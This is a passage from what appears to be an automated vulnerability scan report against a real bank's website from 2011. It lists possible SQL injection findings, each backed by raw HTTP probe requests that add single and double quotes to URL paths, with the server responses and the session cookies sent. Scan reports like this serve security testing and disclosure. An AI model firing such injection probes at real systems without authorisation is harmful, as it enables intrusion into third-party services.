<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fehl.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/ehl.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748248575:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:55:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.114. http://www.regions.com/personal_banking/get_started_online_statements.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/personal_banking/get_started_online_statements.rf

Issue detail

Request 1

GET /personal_banking'/get_started_online_statements.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/get_started_online_statements.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 208

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fget_started_online_statements.rf">here</a>.</h2>
</body><
...[SNIP]...

Request 2

GET /personal_banking''/get_started_online_statements.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.115. http://www.regions.com/personal_banking/online_banking_help.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/personal_banking/online_banking_help.rf

Issue detail

Request 1

GET /personal_banking'/online_banking_help.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1 (redirected)

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:49:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Regions | Site Error
</title>
...[SNIP]...

Request 2

GET /personal_banking''/online_banking_help.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

1.116. http://www.regions.com/personal_banking/online_statements.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/personal_banking/online_statements.rf

Issue detail

Request 1

GET /personal_banking'/online_statements.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/online_statements.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 196

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fonline_statements.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/online_statements.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.117. http://www.regions.com/personal_banking/open_account.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/personal_banking/open_account.rf

Issue detail

Request 1

GET /personal_banking'/open_account.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:49:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/open_account.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 191

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fopen_account.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/open_account.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.118. http://www.regions.com/personal_banking/regionsnet.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/personal_banking/regionsnet.rf

Issue detail

Request 1

GET /personal_banking'/regionsnet.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:49:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/regionsnet.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 189

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fregionsnet.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/regionsnet.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.119. http://www.regions.com/personal_banking/regionsnet_bill_pay.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/personal_banking/regionsnet_bill_pay.rf

Issue detail

Request 1

GET /personal_banking'/regionsnet_bill_pay.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/regionsnet_bill_pay.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 198

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fregionsnet_bill_pay.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/regionsnet_bill_pay.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.120. http://www.regions.com/promotion/black_history.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/promotion/black_history.rf

Issue detail

Request 1

GET /promotion'/black_history.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/promotion'/black_history.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 185

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpromotion'%2fblack_history.rf">here</a>.</h2>
</body></html>

Request 2

GET /promotion''/black_history.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.121. http://www.regions.com/promotion/loans.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/promotion/loans.rf

Issue detail

Request 1

GET /promotion'/loans.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/promotion'/loans.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 177

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpromotion'%2floans.rf">here</a>.</h2>
</body></html>

Request 2

GET /promotion''/loans.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.122. http://www.regions.com/small_business/regionsnet_business.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/small_business/regionsnet_business.rf

Issue detail

Request 1

GET /small_business'/regionsnet_business.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/small_business'/regionsnet_business.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 196

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fsmall_business'%2fregionsnet_business.rf">here</a>.</h2>
</body></html>

Request 2

GET /small_business''/regionsnet_business.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.123. http://www.regions.com/system/unsupportedbrowser.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/system/unsupportedbrowser.rf

Issue detail

Request 1

GET /system'/unsupportedbrowser.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/system'/unsupportedbrowser.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 187

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fsystem'%2funsupportedbrowser.rf">here</a>.</h2>
</body></html>

Request 2

GET /system''/unsupportedbrowser.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.124. https://www.regions.com/FAQ/insured_deposits.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/FAQ/insured_deposits.rf

Issue detail

Request 1

GET /FAQ'/insured_deposits.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/FAQ'/insured_deposits.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 182

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fFAQ'%2finsured_deposits.rf">here</a>.</h2>
</body></html>

Request 2

GET /FAQ''/insured_deposits.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.125. https://www.regions.com/about_regions/economic_update.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/about_regions/economic_update.rf

Issue detail

Request 1

GET /about_regions'/economic_update.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/about_regions'/economic_update.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 191

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fabout_regions'%2feconomic_update.rf">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/economic_update.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.126. https://www.regions.com/personal_banking/alternative_education_loans.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/alternative_education_loans.rf

Issue detail

Request 1

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/alternative_education_loans.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 206

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2falternative_education_loans.rf">here</a>.</h2>
</body></h
...[SNIP]...

Request 2

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.127. https://www.regions.com/personal_banking/auto_loans.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/auto_loans.rf

Issue detail

Request 1

GET /personal_banking'/auto_loans.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/auto_loans.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 189

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fauto_loans.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/auto_loans.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.128. https://www.regions.com/personal_banking/cds.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/cds.rf

Issue detail

Request 1

GET /personal_banking'/cds.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/cds.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 182

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fcds.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/cds.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.129. https://www.regions.com/personal_banking/checking.rf [REST URL parameter 1] previous next

